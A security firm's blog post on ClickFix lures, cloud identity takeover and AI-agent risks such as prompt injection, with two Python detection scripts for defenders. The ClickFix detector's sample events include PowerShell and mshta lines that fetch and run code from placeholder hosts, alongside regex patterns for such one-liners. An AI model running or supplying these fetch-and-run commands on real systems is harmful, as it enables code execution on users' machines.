Recon InfoSec

What's Actually Hitting Organizations Right Now: ClickFix, Identity Compromise, and AI-Powered Risk

Written by Andrew Cook | May 8, 2026 8:31:59 PM

Every day at Recon InfoSec we’re thinking about one thing: how are we giving bad guys headaches? To do that well, you have to stay close to what those bad guys are actually doing. So let me share what we're seeing in the field right now, because some of it is more creative than some people realize.

The Threats You Need to Know About

The least likely but highest impact incident is still a full network breach: attackers with code execution on your machines, lateral movement through your environment, and ultimately ransomware. It's what everybody's most scared of, and for good reason.

Lately, those breaches are starting in two main places. First, your VPN. Your VPN is not a security appliance. It's a front door. Attackers have already exploited FortiGate and Cisco vulnerabilities this year and walked right through that front door, so multi-factor authentication on your VPN is non-negotiable at this point.

The second entry point is something called ClickFix, and it's worth understanding because it's genuinely clever. Users end up on malicious websites and find something that looks completely legitimate: a fake CAPTCHA, a Cloudflare popup, a Microsoft prompt. The page asks them to verify they're human by pressing Windows+R, pasting whatever they just copied to their clipboard, and hitting Enter. What they're pasting is PowerShell. It's code execution. We warned about this last year and it only got more sophisticated. They even started using fake Blue Screen of Death messages as the lure. Attackers have evolved the technique further, moving to Windows Terminal to bypass security tools that had gotten better at detecting the original method.
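One way to hunt for the paste-into-Run pattern in process-creation telemetry, as an added example written for this post rather than code from Recon InfoSec: the rule below flags a shell interpreter whose parent is explorer.exe (the Run dialog) or Windows Terminal, the newer variant mentioned above, and whose command line carries fragments typical of a pasted one-liner. The JSONL field names (ts, host, user, parent, image, cmdline) and the sample events are constructed for this example; a Sysmon, Velociraptor or Timesketch export will need its fields mapped onto them first.

```python
"""Flag process-creation events that look like ClickFix: a shell launched from
the Run dialog (explorer.exe parent) or Windows Terminal, carrying the flags and
download-and-execute fragments typical of a pasted one-liner."""
import json
import re

# Parents seen when a user pastes into Win+R or into a terminal window.
# The Windows Terminal entries cover the newer variant described in the post.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "wt.exe", "openconsole.exe"}
# Interpreters that will execute pasted text.
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line fragments common in pasted one-liners; keys are the labels reported.
SUSPICIOUS = {
    "encoded-command": r"-e(c|nc(odedcommand)?)?\b",   # -e / -ec / -enc / -encodedcommand
    "hidden-window": r"-w(indowstyle)?\s+hidden",
    "no-profile": r"-nop\b|-noprofile",
    "web-download": r"\b(iwr|invoke-webrequest|curl|wget)\b|downloadstring",
    "invoke-expression": r"\biex\b|invoke-expression",
    "url": r"https?://",
}

# Constructed sample events in a Sysmon-style JSONL shape (not real telemetry).
# WS-088 is a user opening PowerShell normally; WS-055 is a scheduled task under
# cmd.exe, which this rule deliberately leaves to a different detection.
SAMPLE_EVENTS = r"""
{"ts":"2026-05-06T14:02:11Z","host":"WS-042","user":"jdoe","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -w hidden -nop -c \"iwr https://captcha-check.invalid/v | iex\""}
{"ts":"2026-05-06T14:05:47Z","host":"WS-017","user":"asmith","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe https://cdn-verify.invalid/h.hta"}
{"ts":"2026-05-06T14:09:03Z","host":"WS-088","user":"bwong","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\""}
{"ts":"2026-05-06T14:12:30Z","host":"WS-103","user":"clee","parent":"C:\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal\\wt.exe","image":"C:\\Program Files\\PowerShell\\7\\pwsh.exe","cmdline":"pwsh.exe -nop -enc <base64-omitted>"}
{"ts":"2026-05-06T14:15:00Z","host":"WS-055","user":"svc_backup","parent":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -enc <base64-omitted>"}
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(jsonl: str) -> list[dict]:
    """One dict per non-empty JSONL line."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def clickfix_indicators(event: dict) -> list[str]:
    """Labels of the suspicious fragments found in a matching event; [] when the
    parent/child pair is not the interactive-paste shape or nothing matches."""
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["image"]) not in SHELL_CHILDREN:
        return []
    cmd = event["cmdline"]
    return [label for label, pat in SUSPICIOUS.items() if re.search(pat, cmd, re.IGNORECASE)]


def detect_clickfix(jsonl: str) -> list[dict]:
    """Run the rule over JSONL events and return one finding per hit."""
    findings = []
    for ev in parse_events(jsonl):
        hits = clickfix_indicators(ev)
        if hits:
            findings.append({
                "ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                "parent": basename(ev["parent"]), "image": basename(ev["image"]),
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']}: {f['parent']} -> {f['image']} "
              f"[{', '.join(f['indicators'])}]")
```

The parent/child pairing is what keeps the rule quiet: a plain PowerShell window opened from the Start menu (WS-088) has no suspicious fragments, and encoded commands launched by cmd.exe (WS-055) belong to a separate scheduled-task rule rather than this one.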

The More Common Problem: Identity Compromise

Ransomware has gotten harder to pull off. Bad guys are practical, and right now the quickest path to money runs through your cloud identity.

We’ve been seeing a lot of business email compromises through cloud account takeovers. A user enters their credentials and MFA code into a fake login page, while an attacker sitting in the middle captures everything in real time. The MFA you put in place doesn't help when someone is intercepting the whole session.

Once they're in, two things tend to happen. If the account looks useful for financial fraud, they'll sit quietly inside email conversations and swap out a legitimate invoice or wire transfer details with their own. If not, they'll use the trusted mailbox to spread the attack further.
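The session-relay attack described above leaves a recognizable shape in identity-provider sign-in logs, and the following is an added example of hunting for it (written for this post, not Recon InfoSec's tooling). Because the victim types credentials and the MFA code into the attacker's proxy, the provider records an interactive, MFA-satisfied sign-in from the proxy's network; minutes later the stolen session token is replayed from wherever the attacker's browser sits, which shows up as a successful non-interactive sign-in from a different ASN. The CSV column names and all sample rows are constructed for this example; Entra ID or Okta exports carry the same facts under their own field names.

```python
"""Flag the sign-in shape produced by an adversary-in-the-middle phishing kit:
an interactive, MFA-satisfied sign-in followed within minutes by a successful
non-interactive sign-in for the same user from a different network."""
import csv
import io
from dataclasses import dataclass
from datetime import datetime, timedelta

# How soon after the MFA-satisfied sign-in a token reuse must appear to be paired with it.
WINDOW = timedelta(minutes=10)

# Constructed sample sign-ins (not real log data). p.adams is the relay case;
# m.ruiz is a normal silent token refresh from the same network; k.osei's reuse
# comes hours later, outside this rule's window.
SAMPLE_SIGNINS = """ts,user,ip,asn,interactive,mfa_challenged,success
2026-05-05T09:01:12Z,p.adams@example.com,203.0.113.77,EXAMPLE-HOSTING-A,true,true,true
2026-05-05T09:03:40Z,p.adams@example.com,203.0.113.150,EXAMPLE-HOSTING-B,false,false,true
2026-05-05T09:30:00Z,m.ruiz@example.com,198.51.100.88,EXAMPLE-ISP,true,true,true
2026-05-05T09:31:10Z,m.ruiz@example.com,198.51.100.88,EXAMPLE-ISP,false,false,true
2026-05-05T11:00:00Z,k.osei@example.com,192.0.2.10,EXAMPLE-ISP,true,true,true
2026-05-05T13:45:00Z,k.osei@example.com,203.0.113.9,EXAMPLE-HOSTING-A,false,false,true
"""


@dataclass
class SignIn:
    ts: datetime
    user: str
    ip: str
    asn: str
    interactive: bool     # credentials or an MFA prompt were answered at this IP
    mfa_challenged: bool  # an MFA challenge was completed in this sign-in
    success: bool


def _truthy(value: str) -> bool:
    return value.strip().lower() == "true"


def parse_signins(csv_text: str) -> list[SignIn]:
    """Parse the CSV into SignIn records sorted by user, then time."""
    rows = []
    for r in csv.DictReader(io.StringIO(csv_text)):
        rows.append(SignIn(
            ts=datetime.fromisoformat(r["ts"].replace("Z", "+00:00")),
            user=r["user"], ip=r["ip"], asn=r["asn"],
            interactive=_truthy(r["interactive"]),
            mfa_challenged=_truthy(r["mfa_challenged"]),
            success=_truthy(r["success"]),
        ))
    rows.sort(key=lambda s: (s.user, s.ts))
    return rows


def detect_token_replay(csv_text: str, window: timedelta = WINDOW) -> list[dict]:
    """Pair each interactive MFA-satisfied sign-in with any later successful
    non-interactive sign-in by the same user from a different ASN inside the window."""
    by_user: dict[str, list[SignIn]] = {}
    for s in parse_signins(csv_text):
        by_user.setdefault(s.user, []).append(s)

    findings = []
    for user, events in by_user.items():
        for i, anchor in enumerate(events):
            if not (anchor.success and anchor.interactive and anchor.mfa_challenged):
                continue
            for later in events[i + 1:]:
                gap = later.ts - anchor.ts
                if gap > window:
                    break  # events are time-sorted, so nothing further can pair
                if later.success and not later.interactive and later.asn != anchor.asn:
                    findings.append({
                        "user": user,
                        "mfa_ip": anchor.ip, "mfa_asn": anchor.asn,
                        "replay_ip": later.ip, "replay_asn": later.asn,
                        "seconds_between": int(gap.total_seconds()),
                    })
    return findings


if __name__ == "__main__":
    for f in detect_token_replay(SAMPLE_SIGNINS):
        print(f"{f['user']}: MFA at {f['mfa_ip']} ({f['mfa_asn']}), session reused "
              f"{f['seconds_between']}s later from {f['replay_ip']} ({f['replay_asn']})")
```

Treat a hit as a triage signal rather than proof: a laptop moving from Wi-Fi to a phone hotspot produces the same pairing, so the next step is checking whether the MFA-satisfying ASN has ever been seen for that user. A replay that waits hours, like k.osei in the sample, needs a wider window or an impossible-travel rule; widening the window to three hours here catches that row as well.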

The Risk Nobody's Talking About Enough: AI

There are real and emerging enterprise security risks coming from AI, and we're already working cases because of it.

According to some recently published research, nearly half of employees use AI tools through personal accounts outside their organization's IT oversight, creating blind spots that attackers are starting to exploit. We worked a case recently where a non-technical user was running what looked like suspicious PowerShell. It turned out they were on ChatGPT, asking it to help with something on their computer, and just running whatever commands it gave them without understanding what any of it meant.

The more dangerous end of this problem involves AI tools that require broad access to your systems and operate autonomously without human approval. Our Head of Recon Labs recently broke down exactly why this matters: when you hand broad system access to an AI agent that acts on your behalf without human review, you're exposed not only to data loss, but to prompt injection, where attackers craft inputs that trick the agent into acting against your interests. These aren't theoretical risks. We're already seeing them in real environments.

What You Can Do

Patch your VPN and prioritize it. Enable multi-factor authentication everywhere you can, and look into solutions that go beyond standard MFA for cloud access. Train your users specifically on ClickFix-style attacks, because traditional phishing awareness doesn't typically cover attacks that instruct users to paste things into the Run dialog. Have a real conversation about which AI tools are approved for use in your organization, and why it matters.

When we're investigating incidents like these, tools like SIFT Workstation, Velociraptor, and Timesketch are what help us piece together exactly what happened. That visibility is often what separates a confident answer from an educated guess, especially when lawyers are asking whether data actually left the network.

We help overwhelmed IT teams stop threats like these through Managed Security Operations. If you would like to learn more, let’s talk!